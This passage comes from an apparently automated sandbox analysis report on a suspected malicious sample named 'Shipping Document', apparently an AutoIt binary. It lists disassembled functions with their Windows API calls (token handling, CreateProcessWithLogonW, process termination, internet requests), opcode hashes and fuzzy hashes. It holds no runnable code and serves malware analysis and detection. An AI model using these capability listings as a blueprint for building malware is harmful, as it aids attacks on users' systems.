                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                              • String ID:
                              • API String ID: 4137160315-0
                              • Opcode ID: 40e5cc30a1450cb7859aef050eac4fa1025fa91148e9b8e5e1cfd319c7c374ae
                              • Instruction ID: 841e63fbfec329b87f3fe31bb3ca1e3ff4f044ea50e14f3a1cfe2cbbb0811074
                              • Opcode Fuzzy Hash: 40e5cc30a1450cb7859aef050eac4fa1025fa91148e9b8e5e1cfd319c7c374ae
                              • Instruction Fuzzy Hash: E031B0B2504316ABD720DF58D888F9BBBE9FF98314F004919F9D997181CB75E908CB92
                              APIs
                                • Part of subcall function 010185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01018608
                                • Part of subcall function 010185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01018612
                                • Part of subcall function 010185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01018621
                                • Part of subcall function 010185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01018628
                                • Part of subcall function 010185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101863E
                              • GetLengthSid.ADVAPI32(?,00000000,01018977), ref: 01018DAC
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01018DB8
                              • HeapAlloc.KERNEL32(00000000), ref: 01018DBF
                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 01018DD8
                              • GetProcessHeap.KERNEL32(00000000,00000000,01018977), ref: 01018DEC
                              • HeapFree.KERNEL32(00000000), ref: 01018DF3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                              • String ID:
                              • API String ID: 3008561057-0
                              • Opcode ID: 326859dbdbf857ba19bb27a3dd29e5d2558cc029278360ccf2881a3c31fa7fa5
                              • Instruction ID: 723fe7897d3460fbb7d73b82a97e7341cc36d854ef7044fdde410740c963fceb
                              • Opcode Fuzzy Hash: 326859dbdbf857ba19bb27a3dd29e5d2558cc029278360ccf2881a3c31fa7fa5
                              • Instruction Fuzzy Hash: 9A11E175500606FFDB60AFA8CD88BAE7BA9EF51315F50805AF9C597208C73A9A00CB60
                              APIs
                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01018B2A
                              • OpenProcessToken.ADVAPI32(00000000), ref: 01018B31
                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01018B40
                              • CloseHandle.KERNEL32(00000004), ref: 01018B4B
                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01018B7A
                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 01018B8E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                              • String ID:
                              • API String ID: 1413079979-0
                              • Opcode ID: 19dab303adb77ed1158703333b5d20bc9abcf937607faafa44a61fb1cf761a8e
                              • Instruction ID: 1179b1785e6d6f1b8a18b5c994680f20cb9ac251dd67e1ccebca0f785a1e2049
                              • Opcode Fuzzy Hash: 19dab303adb77ed1158703333b5d20bc9abcf937607faafa44a61fb1cf761a8e
                              • Instruction Fuzzy Hash: EA111DB650120AABEB118F98ED89FDA7BE9FB45304F044055FE44A2154C27A9E609B60
                              APIs
                                • Part of subcall function 00FC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
                                • Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC135C
                                • Part of subcall function 00FC12F3: BeginPath.GDI32(?), ref: 00FC1373
                                • Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC139C
                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0104C1C4
                              • LineTo.GDI32(00000000,00000003,?), ref: 0104C1D8
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104C1E6
                              • LineTo.GDI32(00000000,00000000,?), ref: 0104C1F6
                              • EndPath.GDI32(00000000), ref: 0104C206
                              • StrokePath.GDI32(00000000), ref: 0104C216
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                              • String ID:
                              • API String ID: 43455801-0
                              • Opcode ID: cf29c2c1f10918e90d6f3f0b07c64de7dc4859fe3fa0f9c2c0fe89c65bb7311c
                              • Instruction ID: 91da79ab4b8c95d7388c69213b0fe3639adfec00a583c6122065f46010fe5090
                              • Opcode Fuzzy Hash: cf29c2c1f10918e90d6f3f0b07c64de7dc4859fe3fa0f9c2c0fe89c65bb7311c
                              • Instruction Fuzzy Hash: 0D115EB600010DBFEF219F94DD88FDA3FACEB04354F048021BA8846165C7769D54DBA0
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FE03D3
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FE03DB
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FE03E6
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FE03F1
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FE03F9
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE0401
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c246b060f32b71d6900534dba0d7e1e49e82d77212d56a50eb9fcc3cc262a4f3
                              • Instruction ID: f38200f2867656847c097720d73222093864512debc349775a3d42b0e966fc47
                              • Opcode Fuzzy Hash: c246b060f32b71d6900534dba0d7e1e49e82d77212d56a50eb9fcc3cc262a4f3
                              • Instruction Fuzzy Hash: 79016CB090275A7DE3009F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0102569B
                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010256B1
                              • GetWindowThreadProcessId.USER32(?,?), ref: 010256C0
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256CF
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256D9
                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256E0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                              • String ID:
                              • API String ID: 839392675-0
                              • Opcode ID: a52256f202aa07a51422b31774e4049f841d70cf4814ad9ecc8a9c4fcee7aa83
                              • Instruction ID: 36433969bd43e1d5cde34f50d507174e1e1cd1e9faeb08e2a2cd941a27d3beb3
                              • Opcode Fuzzy Hash: a52256f202aa07a51422b31774e4049f841d70cf4814ad9ecc8a9c4fcee7aa83
                              • Instruction Fuzzy Hash: 21F09675141159BBE3315A66DD4DEEF7B7CEFCBB11F000159F940D1041D7A61A0187B5
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 010274E5
                              • EnterCriticalSection.KERNEL32(?,?,00FD1044,?,?), ref: 010274F6
                              • TerminateThread.KERNEL32(00000000,000001F6,?,00FD1044,?,?), ref: 01027503
                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FD1044,?,?), ref: 01027510
                                • Part of subcall function 01026ED7: CloseHandle.KERNEL32(00000000,?,0102751D,?,00FD1044,?,?), ref: 01026EE1
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 01027523
                              • LeaveCriticalSection.KERNEL32(?,?,00FD1044,?,?), ref: 0102752A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: b96826a039c76c010020ae4038ee5bb8685a2974df09002b6c9959224d4c0a2d
                              • Instruction ID: 281f3e3bd1c684536e971130f14ebb0eb1e1aa94050f39c793b8cddb65c50377
                              • Opcode Fuzzy Hash: b96826a039c76c010020ae4038ee5bb8685a2974df09002b6c9959224d4c0a2d
                              • Instruction Fuzzy Hash: 41F054BE540623ABEB212B68FFCC9DB7B69EF45302B000561F682910A8CB7A5401CB50
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01018E7F
                              • UnloadUserProfile.USERENV(?,?), ref: 01018E8B
                              • CloseHandle.KERNEL32(?), ref: 01018E94
                              • CloseHandle.KERNEL32(?), ref: 01018E9C
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01018EA5
                              • HeapFree.KERNEL32(00000000), ref: 01018EAC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: 625c63b03d8432b702a7b0529286dfceeee090e5ce680978e1c1777cb92f9049
                              • Instruction ID: 90cf2ae884b947986d0168f10d42123af3509f03be4b074c3b7eb5fe976aba35
                              • Opcode Fuzzy Hash: 625c63b03d8432b702a7b0529286dfceeee090e5ce680978e1c1777cb92f9049
                              • Instruction Fuzzy Hash: 14E0EDBA004002BBD7112FE9EE4C906BFB9FF897227108220F255C1478CB3B5420DB50
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 01038928
                              • CharUpperBuffW.USER32(?,?), ref: 01038A37
                              • VariantClear.OLEAUT32(?), ref: 01038BAF
                                • Part of subcall function 01027804: VariantInit.OLEAUT32(00000000), ref: 01027844
                                • Part of subcall function 01027804: VariantCopy.OLEAUT32(00000000,?), ref: 0102784D
                                • Part of subcall function 01027804: VariantClear.OLEAUT32(00000000), ref: 01027859
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                              • API String ID: 4237274167-1221869570
                              • Opcode ID: 173149758d68c6cc7c3b73e4695708629e08eff8cd36e453788558a04de7d0be
                              • Instruction ID: ae932d8ea845bee59c7747cff017f64611d9dd802d925d5e6a7d27de8c8ff714
                              • Opcode Fuzzy Hash: 173149758d68c6cc7c3b73e4695708629e08eff8cd36e453788558a04de7d0be
                              • Instruction Fuzzy Hash: E5919F74608302DFC714DF28C58595ABBE8EFC8714F048AAEF89A8B351DB35E945CB52
                              APIs
                                • Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9
                              • _memset.LIBCMT ref: 01023077
                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 010230A6
                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01023159
                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01023187
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                              • String ID: 0
                              • API String ID: 4152858687-4108050209
                              • Opcode ID: 2c288c315af29eeec901389e69ca354e7c26770783f8faf859e98a36ec875721
                              • Instruction ID: 2333f6fbc83c90d96f63b26b457a94ae6e3475f2f003fda915c10f10bec2094f
                              • Opcode Fuzzy Hash: 2c288c315af29eeec901389e69ca354e7c26770783f8faf859e98a36ec875721
                              • Instruction Fuzzy Hash: 615102316083219BE7A59E28C845B6BBBF4FF48310F140A6DFAC5DB191DB79C9448792
                              APIs
                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0101DAC5
                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0101DAFB
                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0101DB0C
                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0101DB8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorMode$AddressCreateInstanceProc
                              • String ID: DllGetClassObject
                              • API String ID: 753597075-1075368562
                              • Opcode ID: ee361bc0681ade029ec7ab610bdb6f4fe4069748288ea0bdbaaaf0a05e722e63
                              • Instruction ID: 29b97b28310d5d646912861f49f00d17d20b8f68b53063261905133e8d34dc02
                              • Opcode Fuzzy Hash: ee361bc0681ade029ec7ab610bdb6f4fe4069748288ea0bdbaaaf0a05e722e63
                              • Instruction Fuzzy Hash: 534185B1600209EFDB15CF99C8C8A9A7BF9FF44314F04819DAE469F209D7B5D940CBA0
                              APIs
                              • _memset.LIBCMT ref: 01022CAF
                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01022CCB
                              • DeleteMenu.USER32(?,00000007,00000000), ref: 01022D11
                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01086890,00000000), ref: 01022D5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem_memset
                              • String ID: 0
                              • API String ID: 1173514356-4108050209
                              • Opcode ID: 37df962dcbaf43c649faa7e4dc1f2199a936538c1c675859d2942b7ab4746f25
                              • Instruction ID: 5ca3359ba41d9d1383d829a7a6d793eec5265ca512e9a299de25feb5dddfd2de
                              • Opcode Fuzzy Hash: 37df962dcbaf43c649faa7e4dc1f2199a936538c1c675859d2942b7ab4746f25
                              • Instruction Fuzzy Hash: 5841BF742043529FD720EF68C884B5BBBE8EF85320F14465EFAA5972A1D770E505CBA2
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010193F6
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01019409
                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 01019439
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove$ClassName
                              • String ID: ComboBox$ListBox
                              • API String ID: 365058703-1403004172
                              • Opcode ID: 92e045ed388b03fcadfe1da57285e7e87df0c8d7bd91dc33e18aef57968e5633
                              • Instruction ID: 54afbd7e9e2b4808efef86ac62ac43946e8969ade7795e476f267952ebbdca55
                              • Opcode Fuzzy Hash: 92e045ed388b03fcadfe1da57285e7e87df0c8d7bd91dc33e18aef57968e5633
                              • Instruction Fuzzy Hash: EB2146B1940105BFEB14AB75CC86DFEBBB8DF05364B00411DF9A6971E4CF3D09099A10
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01031B40
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01031B66
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01031B96
                              • InternetCloseHandle.WININET(00000000), ref: 01031BDD
                                • Part of subcall function 01032777: GetLastError.KERNEL32(?,?,01031B0B,00000000,00000000,00000001), ref: 0103278C
                                • Part of subcall function 01032777: SetEvent.KERNEL32(?,?,01031B0B,00000000,00000000,00000001), ref: 010327A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3113390036-3916222277
                              • Opcode ID: dfd86a87e8d52eb9cf034739ddd898f5d19cdc9e270a7cebadf3f650ea9222ef
                              • Instruction ID: 9e2eef2d0fa44eb869f4cfe3b0b297151cb9b7516de4329f00aeb394037d730f
                              • Opcode Fuzzy Hash: dfd86a87e8d52eb9cf034739ddd898f5d19cdc9e270a7cebadf3f650ea9222ef
                              • Instruction Fuzzy Hash: 6C21BEB5500209BFEB269F289CC4EBF76ECFB89644F00011AF585E2240EB399D0587B1
                              APIs
                                • Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
                                • Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
                                • Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91
                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 010466D0
                              • LoadLibraryW.KERNEL32(?), ref: 010466D7
                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010466EC
                              • DestroyWindow.USER32(?), ref: 010466F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                              • String ID: SysAnimate32
                              • API String ID: 4146253029-1011021900
                              • Opcode ID: 582d942775272bf48474bdaeb584585d20373ec9200ee129cce8d691d18b48b2
                              • Instruction ID: 833d6023ba34fc601fd57cc30bed7188b43b558cc4e5e6789066ea31e681b38e
                              • Opcode Fuzzy Hash: 582d942775272bf48474bdaeb584585d20373ec9200ee129cce8d691d18b48b2
                              • Instruction Fuzzy Hash: 7E218BF1200206ABEF119E68ECC0EBB77E9FB4A364F104639FA9196191E77388519760
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0102712B
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0102715D
                              • GetStdHandle.KERNEL32(000000F6), ref: 0102716E
                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010271A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: 4be315b8e66a3e742b5dd8e14492f0f3b087c893a4f17ffbbc45dc02e99a3e9e
                              • Instruction ID: 424b6276e9f6d9912c6e207a8f64029950755484577e942cfea4ba7da05899dd
                              • Opcode Fuzzy Hash: 4be315b8e66a3e742b5dd8e14492f0f3b087c893a4f17ffbbc45dc02e99a3e9e
